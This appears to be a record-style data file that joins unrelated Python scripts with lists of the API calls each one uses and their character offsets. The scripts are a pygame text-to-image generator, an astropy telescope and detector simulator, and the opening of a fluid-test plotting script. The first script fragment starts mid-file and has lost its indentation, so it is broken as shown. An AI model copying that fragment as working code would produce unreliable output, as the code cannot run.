font = pygame.font.Font(path.join("fonts", filename), fontSize)
_rtext = font.render(text, isSmoooth, color_fg, color_bg)
_width, _height = _rtext.get_size()
if hasBackgroud:
echoBG= u"带"
else:
echoBG= u"无"
Print(u"使用["+ str(fontSize).zfill(3) + "]号字体" + echoBG + "背景色:\t\t\t" + path.join(fontPath, filename))
fontCount += 1
width_one = _width/len(text)
line_len = floor(picEdge/(width_one+2*fontEdge))
imagePath_font = imagePath + path.splitext(filename)[0]
imagePath_big = imagePath_font + "\\big" + image_bg
imagePath_small = imagePath_font + "\\small" + image_bg
imagePath_huge = imagePath_font + "\\huge" + image_bg
mkdir(imagePath_font) if not path.exists(imagePath_font) else None
mkdir(imagePath_huge) if not path.exists(imagePath_huge) else None
mkdir(imagePath_big) if not path.exists(imagePath_big) else None
mkdir(imagePath_small) if not path.exists(imagePath_small) else None
Print(u"将生成最大[" + str(picEdge) + "]pix的图片:\t\t\t" + imagePath_huge)
Print(u"将生成[" + str(picEdge*dst_scale) + "x" + str(picEdge*dst_scale) + "]pix的微信图片:\t" + imagePath_big)
Print(u"将生成[" + str(picEdge*dst_scale/2) + "x" + str(picEdge*dst_scale/2) + "]pix的微信图片:\t" + imagePath_small)
count = 0
for line in open(input_file, mode='r', encoding='utf-8'):
line = line.strip("\n")
if len(line) == 0:
continue
lines = [line]
if len(line) > line_len:
lines = splitByLen(line, line_len)
rtext1 = pygame.Surface((width_one * len(lines[0]) + width_plus * 2, _height * len(lines) + height_plus * 2), pygame.SRCALPHA)
rtext1.set_alpha(0)
if hasBackgroud:
AAfilledRoundedRect(rtext1, rtext1.get_rect(), color_bg, 0.5)
line_count = 0
for every in lines:
rtext = font.render(every, isSmoooth, color_fg, color_bg)
rtext1.blit(rtext, (height_plus, width_plus + line_count * _height))
line_count += 1
pygame.image.save(rtext1, imagePath_huge + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_huge + "\\" + str(count).zfill(2) + ".png")
width_save = floor(picEdge*dst_scale)
height_save = floor(picEdge*dst_scale*rtext1.get_height()/rtext1.get_width())
rtext2 = pygame.transform.smoothscale(rtext1, (width_save, height_save))
rtext3 = pygame.Surface((picEdge*dst_scale, picEdge*dst_scale), pygame.SRCALPHA)
rtext3.set_alpha(0)
rtext3.blit(rtext2, (0, (picEdge*dst_scale - rtext2.get_height())/2))
pygame.image.save(rtext3, imagePath_big + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_big + "\\" + str(count).zfill(2) + ".png")
rtext2 = pygame.transform.smoothscale(rtext3, (floor(rtext3.get_width()/2), floor(rtext3.get_height()/2)))
pygame.image.save(rtext2, imagePath_small + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_small + "\\" + str(count).zfill(2) + ".png")
count += 1
__DEBUG__ = True
def Print(string):
print(string) if __DEBUG__ else None
generate_pic(True, (0, 0, 0, 0))
generate_pic(False, (0, 0, 0, 0))
|
[
"os.mkdir",
"pygame.Surface",
"codecs.open",
"pygame.transform.smoothscale",
"os.getcwd",
"pygame.Rect",
"pygame.Color",
"os.path.exists",
"pygame.init",
"math.floor",
"os.path.splitext",
"os.path.join"
] |
[((747, 764), 'pygame.Rect', 'pygame.Rect', (['rect'], {}), '(rect)\n', (758, 764), False, 'import pygame\n'), ((784, 804), 'pygame.Color', 'pygame.Color', (['*color'], {}), '(*color)\n', (796, 804), False, 'import pygame\n'), ((927, 969), 'pygame.Surface', 'pygame.Surface', (['rect.size', 'pygame.SRCALPHA'], {}), '(rect.size, pygame.SRCALPHA)\n', (941, 969), False, 'import pygame\n'), ((2527, 2535), 'os.getcwd', 'getcwd', ([], {}), '()\n', (2533, 2535), False, 'from os import getcwd\n'), ((2540, 2553), 'pygame.init', 'pygame.init', ([], {}), '()\n', (2551, 2553), False, 'import pygame\n'), ((2569, 2602), 'os.path.join', 'path.join', (['path_prefix', '"""fonts\\\\"""'], {}), "(path_prefix, 'fonts\\\\')\n", (2578, 2602), False, 'from os import path\n'), ((3307, 3341), 'os.path.join', 'path.join', (['path_prefix', '"""images\\\\"""'], {}), "(path_prefix, 'images\\\\')\n", (3316, 3341), False, 'from os import path\n'), ((3466, 3497), 'os.path.join', 'path.join', (['path_prefix', '"""1.txt"""'], {}), "(path_prefix, '1.txt')\n", (3475, 3497), False, 'from os import path\n'), ((3392, 3408), 'os.mkdir', 'mkdir', (['imagePath'], {}), '(imagePath)\n', (3397, 3408), False, 'from os import mkdir\n'), ((3508, 3531), 'os.path.exists', 'path.exists', (['input_file'], {}), '(input_file)\n', (3519, 3531), False, 'from os import path\n'), ((3672, 3693), 'os.path.exists', 'path.exists', (['fontPath'], {}), '(fontPath)\n', (3683, 3693), False, 'from os import path\n'), ((3849, 3868), 'os.path.join', 'path.join', (['fontPath'], {}), '(fontPath)\n', (3858, 3868), False, 'from os import path\n'), ((3416, 3438), 'os.path.exists', 'path.exists', (['imagePath'], {}), '(imagePath)\n', (3427, 3438), False, 'from os import path\n'), ((4709, 4752), 'math.floor', 'floor', (['(picEdge / (width_one + 2 * fontEdge))'], {}), '(picEdge / (width_one + 2 * fontEdge))\n', (4714, 4752), False, 'from math import floor\n'), ((5696, 5740), 'codecs.open', 'open', (['input_file'], {'mode': '"""r"""', 'encoding': '"""utf-8"""'}), "(input_file, mode='r', encoding='utf-8')\n", (5700, 5740), False, 'from codecs import open\n'), ((3964, 3992), 'os.path.join', 'path.join', (['"""fonts"""', 'filename'], {}), "('fonts', filename)\n", (3973, 3992), False, 'from os import path\n'), ((5025, 5046), 'os.mkdir', 'mkdir', (['imagePath_font'], {}), '(imagePath_font)\n', (5030, 5046), False, 'from os import mkdir\n'), ((5104, 5125), 'os.mkdir', 'mkdir', (['imagePath_huge'], {}), '(imagePath_huge)\n', (5109, 5125), False, 'from os import mkdir\n'), ((5183, 5203), 'os.mkdir', 'mkdir', (['imagePath_big'], {}), '(imagePath_big)\n', (5188, 5203), False, 'from os import mkdir\n'), ((5260, 5282), 'os.mkdir', 'mkdir', (['imagePath_small'], {}), '(imagePath_small)\n', (5265, 5282), False, 'from os import mkdir\n'), ((6763, 6789), 'math.floor', 'floor', (['(picEdge * dst_scale)'], {}), '(picEdge * dst_scale)\n', (6768, 6789), False, 'from math import floor\n'), ((6907, 6970), 'pygame.transform.smoothscale', 'pygame.transform.smoothscale', (['rtext1', '(width_save, height_save)'], {}), '(rtext1, (width_save, height_save))\n', (6935, 6970), False, 'import pygame\n'), ((6996, 7071), 'pygame.Surface', 'pygame.Surface', (['(picEdge * dst_scale, picEdge * dst_scale)', 'pygame.SRCALPHA'], {}), '((picEdge * dst_scale, picEdge * dst_scale), pygame.SRCALPHA)\n', (7010, 7071), False, 'import pygame\n'), ((4232, 4260), 'os.path.join', 'path.join', (['"""fonts"""', 'filename'], {}), "('fonts', filename)\n", (4241, 4260), False, 'from os import path\n'), ((4603, 4632), 'os.path.join', 'path.join', (['fontPath', 'filename'], {}), '(fontPath, filename)\n', (4612, 4632), False, 'from os import path\n'), ((4788, 4811), 'os.path.splitext', 'path.splitext', (['filename'], {}), '(filename)\n', (4801, 4811), False, 'from os import path\n'), ((5054, 5081), 'os.path.exists', 'path.exists', (['imagePath_font'], {}), '(imagePath_font)\n', (5065, 5081), False, 'from os import path\n'), ((5133, 5160), 'os.path.exists', 'path.exists', (['imagePath_huge'], {}), '(imagePath_huge)\n', (5144, 5160), False, 'from os import path\n'), ((5211, 5237), 'os.path.exists', 'path.exists', (['imagePath_big'], {}), '(imagePath_big)\n', (5222, 5237), False, 'from os import path\n'), ((5290, 5318), 'os.path.exists', 'path.exists', (['imagePath_small'], {}), '(imagePath_small)\n', (5301, 5318), False, 'from os import path\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from dataclasses import dataclass, field
from typing import Callable, List
from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle
from astropy.time import Time
from astropy.units.quantity import Quantity
from astropy.wcs import WCS
from astropy.visualization.wcsaxes import WCSAxesSubplot
from scipy.spatial.transform import Rotation
from matplotlib.patches import Rectangle
from shapely.geometry import Polygon, Point
from shapely.geometry import MultiPoint
from shapely.prepared import prep
from descartes.patch import PolygonPatch
from scipy.optimize import least_squares
import matplotlib.pyplot as plt
import astropy.units as u
import numpy as np
import pandas as pd
import sys
from .util import get_projection
def identity_transformation(position):
''' An identity transformation function.
This function is an fallback function for the image distortion.
The function requires a tuple of two arrays. The first and second elements
are the x- and y-positions on the focal plane without any distortion,
respectively. This function returns the positions as they are.
Parameters:
position: A numpy.array with the shape of (2, Nsrc). The first element
contains the x-positions, while the second element contains
the y-positions.
Return:
A numpy.ndarray of the input coordinates.
'''
return np.array(position)
@dataclass
class Optics(object):
''' Definition of optical components.
Attributes:
pointing (SkyCoord) : the latitude of the telescope pointing.
position_angle (Angle) : the position angle of the telescope.
focal_length (Quantity): the focal length of the telescope in meter.
diameter (Quantity) : the diameter of the telescope in meter.
valid_region (Polygon) : the valid region of the focal plane.
margin (Quantity) : the margin of the valid region (buffle).
distortion (function) : a function to distort the focal plane image.
'''
pointing: SkyCoord
position_angle: Angle = Angle(0.0, unit='degree')
focal_length: Quantity = 7.3*u.m
diameter: Quantity = 0.4*u.m
valid_region: Polygon = Point(0,0).buffer(30000)
margin: Quantity = 5000*u.um
distortion: Callable = identity_transformation
@property
def scale(self):
''' A conversion factor from sky to focal plane in degree/um. '''
return (1.0*u.rad/self.focal_length).to(u.deg/u.um)
@property
def center(self):
''' A dummy position to defiine the center of the focal plane. '''
return SkyCoord(0*u.deg,0*u.deg,frame='icrs')
@property
def pointing_angle(self):
''' Angle set to define the pointing position and orientation. '''
## use the ICRS frame in calculation.
icrs = self.pointing.icrs
## calculate position angle in the ICRS frame.
north = self.pointing.directional_offset_by(0.0,1*u.arcsec)
delta = self.pointing.icrs.position_angle(north)
position_angle = -self.position_angle.rad-delta.rad
return np.array((icrs.ra.rad,-icrs.dec.rad,position_angle))
def set_distortion(self, distortion):
''' Assign a distortion function.
The argument of the distortion function should be a numpy.array with
the shape of (2, Nsrc). The first element contains the x-positions,
while the second element contains the y-positions.
Parameters:
distortion (function): a function to distort focal plane image.
'''
self.distortion = distortion
def block(self, position):
''' Block sources by a certain radius.
Parameters:
position (ndarray): source positions on the focal plane w/o distortion.
Return:
A boolean array to indicate which sources are inside the field-of-view.
'''
mp = MultiPoint(position.T)
polygon = prep(self.valid_region.buffer(self.margin.to_value(u.um)))
return np.array([not polygon.contains(p) for p in mp.geoms])
def imaging(self, sources, epoch=None):
''' Map celestial positions onto the focal plane.
Parameters:
sources (SkyCoord): the coordinates of sources.
epoch (Time): the epoch of the observation.
Return:
A `DataFrame` instance. The DataFrame contains four columns: the "x" and
"y" columns are the positions on the focal plane in micron, and the "ra"
and "dec" columns are the original celestial positions in the ICRS frame.
'''
try:
if epoch is not None:
sources = sources.apply_space_motion(epoch)
except Exception as e:
print('No proper motion information is available.', file=sys.stderr)
print('The positions are not updated to new epoch.', file=sys.stderr)
icrs = sources.transform_to('icrs')
xyz = icrs.cartesian.xyz
r = Rotation.from_euler('zyx', -self.pointing_angle)
pqr = r.as_matrix() @ xyz
if pqr.ndim==1: pqr = np.expand_dims(pqr,axis=1)
obj = SkyCoord(pqr.T, obstime=epoch,
representation_type='cartesian').transform_to('icrs')
obj.representation_type = 'spherical'
proj = get_projection(self.center,self.scale.to_value())
pos = np.array(obj.to_pixel(proj, origin=0))
blocked = self.block(pos)
pos = self.distortion(pos)
return pd.DataFrame({
'x': pos[0], 'y': pos[1],
'ra': icrs.ra, 'dec': icrs.dec,
'blocked': blocked
})
@dataclass
class PixelDisplacement(object):
''' Definition of the pixel non-uniformity.
Attributes:
dx (ndarray): a two dimensional array with the same size of the detector.
each element contains the x-displacement of the pixel.
dy (ndarray): a two dimensional array with the same size of the detector.
each element contains the y-displacement of the pixel.
'''
dx: np.ndarray = None
dy: np.ndarray = None
def initialize(self, naxis1, naxis2):
''' Initialize the displacement array with zeros.
Parameters:
naxis1 (int): the detector size along with NAXIS1.
naxis2 (int): the detector size along with NAXIS2.
'''
self.dx = np.zeros((naxis2, naxis1))
self.dy = np.zeros((naxis2, naxis1))
def evaluate(self, x, y):
''' Evaluate the source position displacement.
Parameters:
position (ndarray): a numpy.ndarray with the shape of (2, N(sources)).
the first array contains the x-coordinates, while
the second does the y-coordinates.
Note:
Not implemented yet.
'''
return (x,y)
@dataclass
class Detector(object):
''' Definition of a detector.
Attributes:
naxis1 (int) : detector pixels along with NAXIS1.
naxis2 (int) : detector pixels along with NAXIS2.
pixel_scale (Quantity): nominal detector pixel scale.
offset_dx (Quantity) : the offset along with the x-axis.
offset_dy (Quantity) : the offste along with the y-axis.
position_angle (Angle): the position angle of the detector.
displacement (PixelDisplacement):
an instance to define the displacements of the sources due to
the pixel non-uniformity.
'''
naxis1: int = 4096
naxis2: int = 4096
pixel_scale: Quantity = 10*u.um
offset_dx: Quantity = 0*u.um
offset_dy: Quantity = 0*u.um
position_angle: Angle = Angle(0.0, unit='degree')
displacement: PixelDisplacement = None
def __post_init__(self):
if self.displacement is None:
self.displacement = PixelDisplacement()
self.displacement.initialize(self.naxis1,self.naxis2)
@property
def width(self):
''' The physical width of the detector. '''
return self.naxis1*self.pixel_scale.to_value(u.um)
@property
def height(self):
''' The physical height of the detector. '''
return self.naxis2*self.pixel_scale.to_value(u.um)
@property
def xrange(self):
''' The x-axis range of the detector. '''
return np.array((-self.width/2,self.width/2))
@property
def yrange(self):
''' The y-axis range of the detector. '''
return np.array((-self.height/2,self.height/2))
@property
def patch(self):
''' The footprint of the detector on the focal plane as a patch. '''
c,s = np.cos(self.position_angle.rad),np.sin(self.position_angle.rad)
x0,y0 = self.offset_dx.to_value(u.um),self.offset_dy.to_value(u.um)
x1 = x0 - (+ self.width*c - self.height*s)/2
y1 = y0 - (+ self.width*s + self.height*c)/2
return Rectangle((x1,y1), width=self.width, height=self.height,
angle=self.position_angle.deg, ec='r', linewidth=2, fill=False)
@property
def footprint(self):
''' The footprint of the detector on the focal plane. '''
c,s = np.cos(self.position_angle.rad),np.sin(self.position_angle.rad)
x0,y0 = self.offset_dx.to_value(u.um),self.offset_dy.to_value(u.um)
x1 = x0 - (+ self.width*c - self.height*s)/2
y1 = y0 - (+ self.width*s + self.height*c)/2
x2 = x0 - (- self.width*c - self.height*s)/2
y2 = y0 - (- self.width*s + self.height*c)/2
x3 = x0 - (- self.width*c + self.height*s)/2
y3 = y0 - (- self.width*s - self.height*c)/2
x4 = x0 - (+ self.width*c + self.height*s)/2
y4 = y0 - (+ self.width*s - self.height*c)/2
return Polygon(([x1,y1],[x2,y2],[x3,y3],[x4,y4]))
def align(self, x, y):
''' Align the source position to the detector.
Parameters:
x (Series): the x-coordinates on the focal plane.
y (Series): the y-coordinates on the focal plane.
Return:
The tuple of the x- and y-positions of the sources, which are remapped
onto the detector coordinates.
'''
c,s = np.cos(-self.position_angle.rad),np.sin(-self.position_angle.rad)
dx,dy = x-self.offset_dx.to_value(u.um), y-self.offset_dy.to_value(u.um)
return c*dx-s*dy, s*dx+c*dy
def capture(self, position):
''' Calculate the positions of the sources on the detector.
Parameters:
position (DataFrame): the positions of the sources on the focal plane.
the "x" and "y" columns are respectively the x-
and y-positions of the sources in units of micron.
Return:
A list of `DataFrame`s which contains the positions on the detectors.
The number of the `DataFrame`s are the same as the detectors.
The "x" and "y" columns are the positions on each detector. The "ra"
and "dec" columns are the original positions in the ICRS frame.
'''
x,y = self.align(position.x, position.y)
x,y = self.displacement.evaluate(x,y)
position.x = x
position.y = y
bf = ~position.blocked
xf = ((self.xrange[0] < x) & (x < self.xrange[1]))
yf = ((self.yrange[0] < y) & (y < self.yrange[1]))
return position.loc[xf&yf&bf,:]
@dataclass
class Telescope(object):
''' An imaginary telescope instance.
The `Telescope` class is composed of an `Optics` instance and a list of
`Detector` instances. This instance organizes the alignment of the detectors
and converts the coordinates of the astronomical sources into the positions
on the detectors.
Attributes:
pointing (SkyCoord)
position_angle (Angle):
'''
pointing: SkyCoord = None
position_angle: Angle = None
optics: Optics = None
detectors: List[Detector] = None
def __post_init__(self):
if self.optics is None:
self.optics = Optics(self.pointing, self.position_angle)
else:
self.pointing = self.optics.pointing
self.position_angle = self.optics.position_angle
if self.detectors is None:
self.detectors = [Detector(),]
assert self.optics is not None
assert self.detectors is not None
def set_distortion(self, distortion):
''' Set a distortion function to the optics.
Parameters:
distortion (function): a function to distort focal plane image.
'''
self.optics.set_distortion(distortion)
def get_footprints(self, **options):
''' Obtain detector footprints on the sky.
Options:
frame (string): specify the coordinate of the footprint.
limit (bool): limit the footprints within the valid region.
patch (bool): obtain PolygonPatch instead of Polygon.
'''
frame = options.pop('frame', self.pointing.frame.name)
limit = options.pop('limit', True)
patch = options.pop('patch', False)
if self.pointing.frame.name == 'galactic':
l0 = self.pointing.galactic.l
b0 = self.pointing.galactic.b
else:
l0 = self.pointing.icrs.ra
b0 = self.pointing.icrs.dec
def generate(e):
frame = self.pointing.frame
def func(x):
pos = x.reshape((-1,2))
p0 = SkyCoord(pos[:,0], pos[:,1], frame=frame, unit=u.deg)
res = self.optics.imaging(p0)
return (e-res[['x','y']].to_numpy()).flatten()
return func
footprints = []
valid_region = self.optics.valid_region
for d in self.detectors:
fp = valid_region.intersection(d.footprint) if limit else d.footprint
edge = np.array(fp.boundary.coords[0:-1])
p0 = np.tile([l0.deg,b0.deg],edge.shape[0])
func = generate(edge)
res = least_squares(func, p0)
pos = res.x.reshape((-1,2))
sky = SkyCoord(pos[:,0]*u.deg,pos[:,1]*u.deg,
frame=self.pointing.frame.name)
if frame == 'galactic':
sky = sky.galactic
pos = Polygon(np.stack([sky.l.deg,sky.b.deg]).T)
else:
sky = sky.icrs
pos = Polygon(np.stack([sky.ra.deg,sky.dec.deg]).T)
footprints.append(PolygonPatch(pos, **options) if patch else pos)
return footprints
def overlay_footprints(self, axis, **options):
''' Display the footprints on the given axis.
Parameters:
axis (WCSAxesSubplot):
An axis instance with a WCS projection.
Options:
frame (string): the coodinate frame.
label (string): the label of the footprints.
color (Color): color of the footprint edges.
'''
label = options.pop('label', None)
color = options.pop('color','C2')
frame = options.pop('frame', self.pointing.frame.name)
if isinstance(axis, WCSAxesSubplot):
options['tranform'] = axis.get_transform(frame)
for footprint in self.get_footprints(frame=frame, **options):
v = np.array(footprint.boundary.coords)
axis.plot(v[:,0], v[:,1], c=color, label=label, **options)
return axis
def display_focal_plane(
self, sources=None, epoch=None, axis=None, **options):
''' Display the layout of the detectors.
Show the layout of the detectors on the focal plane. The detectors are
illustrated by the red rectangles. If the `sources` are provided, the
detectors are overlaid on the sources on the focal plane.
Parameters:
sources (SkyCoord): the coordinates of astronomical sources.
epoch (Time) : the observation epoch.
'''
markersize = options.pop('markersize', 1)
marker = options.pop('marker', 'x')
figsize = options.pop('figsize', (8,8))
if axis is None:
fig = plt.figure(figsize=figsize)
axis = fig.add_subplot(111)
axis.set_aspect(1.0)
axis.add_patch(PolygonPatch(
self.optics.valid_region, color=(0.8,0.8,0.8), alpha=0.2))
if sources is not None:
position = self.optics.imaging(sources, epoch)
axis.scatter(position.x,position.y,markersize,marker=marker)
for d in self.detectors:
axis.add_patch(d.patch)
axis.autoscale_view()
axis.grid()
axis.set_xlabel('Displacement on the focal plane ($\mu$m)', fontsize=14)
axis.set_ylabel('Displacement on the focal plane ($\mu$m)', fontsize=14)
if axis is None: fig.tight_layout()
def observe(self, sources, epoch=None):
''' Observe astronomical sources.
Map the sky coordinates of astronomical sources into the physical
positions on the detectors of the telescope.
Parameters:
sources (SkyCoord): a list of astronomical sources.
epoch (Time): the datetime of the observation.
Return:
A numpy.ndarray with the shape of (N(detector), 2, N(source)).
The first index specifies the detector of the telescope.
A two dimensional array is assigned for each detector. The first
line is the coordinates along the NAXIS1 axis, and the second one
is the coordinates along the NAXIS2 axis.
'''
position = self.optics.imaging(sources, epoch)
fov = []
for det in self.detectors:
fov.append(det.capture(position))
return fov
|
[
"pandas.DataFrame",
"numpy.stack",
"shapely.geometry.Point",
"shapely.geometry.MultiPoint",
"descartes.patch.PolygonPatch",
"shapely.geometry.Polygon",
"matplotlib.patches.Rectangle",
"numpy.zeros",
"numpy.expand_dims",
"scipy.optimize.least_squares",
"matplotlib.pyplot.figure",
"numpy.sin",
"numpy.array",
"numpy.tile",
"numpy.cos",
"astropy.coordinates.Angle",
"astropy.coordinates.SkyCoord",
"scipy.spatial.transform.Rotation.from_euler"
] |
[((1409, 1427), 'numpy.array', 'np.array', (['position'], {}), '(position)\n', (1417, 1427), True, 'import numpy as np\n'), ((2059, 2084), 'astropy.coordinates.Angle', 'Angle', (['(0.0)'], {'unit': '"""degree"""'}), "(0.0, unit='degree')\n", (2064, 2084), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((7244, 7269), 'astropy.coordinates.Angle', 'Angle', (['(0.0)'], {'unit': '"""degree"""'}), "(0.0, unit='degree')\n", (7249, 7269), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((2568, 2612), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['(0 * u.deg)', '(0 * u.deg)'], {'frame': '"""icrs"""'}), "(0 * u.deg, 0 * u.deg, frame='icrs')\n", (2576, 2612), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((3026, 3080), 'numpy.array', 'np.array', (['(icrs.ra.rad, -icrs.dec.rad, position_angle)'], {}), '((icrs.ra.rad, -icrs.dec.rad, position_angle))\n', (3034, 3080), True, 'import numpy as np\n'), ((3763, 3785), 'shapely.geometry.MultiPoint', 'MultiPoint', (['position.T'], {}), '(position.T)\n', (3773, 3785), False, 'from shapely.geometry import MultiPoint\n'), ((4745, 4793), 'scipy.spatial.transform.Rotation.from_euler', 'Rotation.from_euler', (['"""zyx"""', '(-self.pointing_angle)'], {}), "('zyx', -self.pointing_angle)\n", (4764, 4793), False, 'from scipy.spatial.transform import Rotation\n'), ((5209, 5305), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': pos[0], 'y': pos[1], 'ra': icrs.ra, 'dec': icrs.dec, 'blocked': blocked}"], {}), "({'x': pos[0], 'y': pos[1], 'ra': icrs.ra, 'dec': icrs.dec,\n 'blocked': blocked})\n", (5221, 5305), True, 'import pandas as pd\n'), ((6038, 6064), 'numpy.zeros', 'np.zeros', (['(naxis2, naxis1)'], {}), '((naxis2, naxis1))\n', (6046, 6064), True, 'import numpy as np\n'), ((6079, 6105), 'numpy.zeros', 'np.zeros', (['(naxis2, naxis1)'], {}), '((naxis2, naxis1))\n', (6087, 6105), True, 'import numpy as np\n'), ((7839, 7882), 'numpy.array', 'np.array', (['(-self.width / 2, self.width / 2)'], {}), '((-self.width / 2, self.width / 2))\n', (7847, 7882), True, 'import numpy as np\n'), ((7967, 8012), 'numpy.array', 'np.array', (['(-self.height / 2, self.height / 2)'], {}), '((-self.height / 2, self.height / 2))\n', (7975, 8012), True, 'import numpy as np\n'), ((8367, 8493), 'matplotlib.patches.Rectangle', 'Rectangle', (['(x1, y1)'], {'width': 'self.width', 'height': 'self.height', 'angle': 'self.position_angle.deg', 'ec': '"""r"""', 'linewidth': '(2)', 'fill': '(False)'}), "((x1, y1), width=self.width, height=self.height, angle=self.\n position_angle.deg, ec='r', linewidth=2, fill=False)\n", (8376, 8493), False, 'from matplotlib.patches import Rectangle\n'), ((9142, 9191), 'shapely.geometry.Polygon', 'Polygon', (['([x1, y1], [x2, y2], [x3, y3], [x4, y4])'], {}), '(([x1, y1], [x2, y2], [x3, y3], [x4, y4]))\n', (9149, 9191), False, 'from shapely.geometry import Polygon, Point\n'), ((2182, 2193), 'shapely.geometry.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (2187, 2193), False, 'from shapely.geometry import Polygon, Point\n'), ((4850, 4877), 'numpy.expand_dims', 'np.expand_dims', (['pqr'], {'axis': '(1)'}), '(pqr, axis=1)\n', (4864, 4877), True, 'import numpy as np\n'), ((8122, 8153), 'numpy.cos', 'np.cos', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8128, 8153), True, 'import numpy as np\n'), ((8154, 8185), 'numpy.sin', 'np.sin', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8160, 8185), True, 'import numpy as np\n'), ((8603, 8634), 'numpy.cos', 'np.cos', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8609, 8634), True, 'import numpy as np\n'), ((8635, 8666), 'numpy.sin', 'np.sin', (['self.position_angle.rad'], {}), '(self.position_angle.rad)\n', (8641, 8666), True, 'import numpy as np\n'), ((9536, 9568), 'numpy.cos', 'np.cos', (['(-self.position_angle.rad)'], {}), '(-self.position_angle.rad)\n', (9542, 9568), True, 'import numpy as np\n'), ((9569, 9601), 'numpy.sin', 'np.sin', (['(-self.position_angle.rad)'], {}), '(-self.position_angle.rad)\n', (9575, 9601), True, 'import numpy as np\n'), ((12900, 12934), 'numpy.array', 'np.array', (['fp.boundary.coords[0:-1]'], {}), '(fp.boundary.coords[0:-1])\n', (12908, 12934), True, 'import numpy as np\n'), ((12946, 12986), 'numpy.tile', 'np.tile', (['[l0.deg, b0.deg]', 'edge.shape[0]'], {}), '([l0.deg, b0.deg], edge.shape[0])\n', (12953, 12986), True, 'import numpy as np\n'), ((13025, 13048), 'scipy.optimize.least_squares', 'least_squares', (['func', 'p0'], {}), '(func, p0)\n', (13038, 13048), False, 'from scipy.optimize import least_squares\n'), ((13095, 13173), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['(pos[:, 0] * u.deg)', '(pos[:, 1] * u.deg)'], {'frame': 'self.pointing.frame.name'}), '(pos[:, 0] * u.deg, pos[:, 1] * u.deg, frame=self.pointing.frame.name)\n', (13103, 13173), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((14161, 14196), 'numpy.array', 'np.array', (['footprint.boundary.coords'], {}), '(footprint.boundary.coords)\n', (14169, 14196), True, 'import numpy as np\n'), ((14935, 14962), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (14945, 14962), True, 'import matplotlib.pyplot as plt\n'), ((15041, 15113), 'descartes.patch.PolygonPatch', 'PolygonPatch', (['self.optics.valid_region'], {'color': '(0.8, 0.8, 0.8)', 'alpha': '(0.2)'}), '(self.optics.valid_region, color=(0.8, 0.8, 0.8), alpha=0.2)\n', (15053, 15113), False, 'from descartes.patch import PolygonPatch\n'), ((4887, 4950), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['pqr.T'], {'obstime': 'epoch', 'representation_type': '"""cartesian"""'}), "(pqr.T, obstime=epoch, representation_type='cartesian')\n", (4895, 4950), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((12553, 12608), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['pos[:, 0]', 'pos[:, 1]'], {'frame': 'frame', 'unit': 'u.deg'}), '(pos[:, 0], pos[:, 1], frame=frame, unit=u.deg)\n', (12561, 12608), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((13421, 13449), 'descartes.patch.PolygonPatch', 'PolygonPatch', (['pos'], {}), '(pos, **options)\n', (13433, 13449), False, 'from descartes.patch import PolygonPatch\n'), ((13267, 13299), 'numpy.stack', 'np.stack', (['[sky.l.deg, sky.b.deg]'], {}), '([sky.l.deg, sky.b.deg])\n', (13275, 13299), True, 'import numpy as np\n'), ((13359, 13394), 'numpy.stack', 'np.stack', (['[sky.ra.deg, sky.dec.deg]'], {}), '([sky.ra.deg, sky.dec.deg])\n', (13367, 13394), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
#------------------------------------------------------------
# Programmer(s): <NAME> @ SMU
#------------------------------------------------------------
# Copyright (c) 2019, Southern Methodist University.
# All rights reserved.
# For details, see the LICENSE file.
#------------------------------------------------------------
# matplotlib-based plotting utility function for
# hurricane test problem in the yz-plane
# imports
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import matplotlib.pyplot as plt
from utilities_euler3D import *
# determine if running interactively
if __name__=="__main__":
showplots = False
else:
showplots = True
# set view for surface plots
elevation = 15
angle = 20
# set test constants
rho0 = 1.0
v0 = 10.0
Amp = 25.0
gamma = 2.0
yl = -1.0
yr = 1.0
zl = -1.0
zr = 1.0
# utility function to create analytical solution
def analytical_solution(t,ny,nz):
if (t == 0):
t = 1e-14
p0prime = Amp*gamma*rho0**(gamma-1.0)
rthresh = 2.0*t*np.sqrt(p0prime)
rho = np.zeros((ny,nz), dtype=float)
my = np.zeros((ny,nz), dtype=float)
mz = np.zeros((ny,nz), dtype=float)
dy = (yr-yl)/ny
dz = (zr-zl)/nz
for j in range(nz):
for i in range(ny):
y = (i+0.5)*dy + yl
z = (j+0.5)*dz + zl
r = np.sqrt(y*y + z*z)
if (r == 0.0): # protect against division by zero
r = 1e-14
costheta = y/r
sintheta = z/r
if (r < rthresh):
rho[i,j] = r*r / (8*Amp*t*t)
my[i,j] = rho[i,j] * (y + z) / (2*t)
mz[i,j] = rho[i,j] * (z - y) / (2*t)
else:
rho[i,j] = rho0
my[i,j] = rho0 * ( 2*t*p0prime*costheta +
np.sqrt(2*p0prime)*np.sqrt(r*r-2*t*t*p0prime)*sintheta )/r
mz[i,j] = rho0 * ( 2*t*p0prime*sintheta -
np.sqrt(2*p0prime)*np.sqrt(r*r-2*t*t*p0prime)*costheta )/r
return [rho, my, mz]
# load solution data
nx, ny, nz, nchem, nt, xgrid, ygrid, zgrid, tgrid, rho, mx, my, mz, et, chem = load_data()
# output general information to screen
print('Generating plots for data set:')
